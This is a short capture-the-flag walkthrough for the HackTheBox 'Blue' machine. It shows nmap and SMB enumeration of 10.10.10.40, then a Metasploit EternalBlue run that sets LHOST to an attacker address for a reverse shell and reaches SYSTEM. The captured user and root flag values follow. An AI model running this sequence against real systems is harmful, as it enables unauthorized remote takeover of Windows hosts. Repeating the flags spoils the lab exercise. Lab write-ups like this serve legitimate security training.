HTB-Blue

sudo nmap -A -p- 10.10.10.40

Pasted image 20240401113929 Pasted image 20240401114006

smbclient --no-pass -L //10.10.10.40

Pasted image 20240401121720

sudo nmap --script smb-* -p 445 10.10.10.40

Pasted image 20240401123227

sudo nmap --script smb-protocols -p 445 10.10.10.40

Pasted image 20240401123924

Victim appears vulnerable to the EternalBlue exploit.

msfconsole -q
search eternal
use 1

Pasted image 20240401125829

options
set RHOSTS 10.10.10.40
set LHOST 10.10.14.12
run

Pasted image 20240401125854

user.txt

dc32b7bfefa8ae6f1d1fc594c9133e80

Pasted image 20240401130008

root.txt

We were nt authority\system so could also access the Administrator’s desktop. aac84c29ac1b9a3b466c54e780ca8b93

louie.rocks